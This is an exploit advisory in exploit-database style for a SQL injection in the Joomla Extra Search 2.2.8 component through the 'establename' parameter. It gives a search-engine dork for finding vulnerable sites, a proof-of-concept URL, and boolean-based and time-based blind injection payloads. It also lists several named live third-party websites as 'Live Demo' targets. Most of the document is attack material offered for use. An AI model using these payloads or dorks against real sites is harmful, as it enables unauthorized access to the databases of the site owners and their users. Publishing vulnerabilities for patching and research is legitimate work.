Joomla Extra Search 2.2.8 SQL Injection

`######################  
# Exploit Title : Joomla com_extrasearch SQL injection Vulnerability  
# Exploit Author : howucan  
# Website : http://howucan.gr  
# Dork : inurl:/index.php?option=com_extrasearch establename  
# Software link : http://www.joomlaboat.com/extra-search  
# Software version : 2.2.8  
# video : http://adf.ly/1cmGen  
# Tested on: [ Parrot os 3.1 ]  
# Date: 2016/07/31  
#  
######################  
# [+] Poc :  
######################  
# Get Parameter establename Vulnerable To SQLi  
#  
http(s)://<host>/<joomla-path>/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes(inject  
here)  
# [+] SQLmap Poc :  
###############  
# Type: boolean-based blind  
# Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (MAKE_SET)  
# Payload:  
option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=-5792"  
OR MAKE_SET(5730=5730,3268) AND "OpLU"="OpLU  
#  
# Type: AND/OR time-based blind  
# Title: MySQL >= 5.0.12 AND time-based blind  
# Payload:  
option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes"  
AND SLEEP(5) AND "bmqB"="bmqB  
#  
######################  
# [+] Live Demo  
#  
http://www.joomlaboat.com/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes%27  
  
#  
http://cursosoxford.com/index.php/en/?option=com_extrasearch&view=details&listing_id=6&Itemid=178&establename=calendar%27&returnto=aHR0cDovL2N1cnNvc294Zm9yZC5jb20vaW5kZXgucGhwL2VuLyNhNg==  
#  
http://tuesmeralda.com/en/?option=com_extrasearch&view=details&listing_id=37&Itemid=106&establename=catalog%27&returnto=aHR0cDovL3R1ZXNtZXJhbGRhLmNvbS9lcy9jb2xlY2Npb24tcGxhdGEtZXNtZXJhbGRhI2EzNw==  
######################  
# Salonika Punk Rock City  
# PAOK G4  
#######################  
`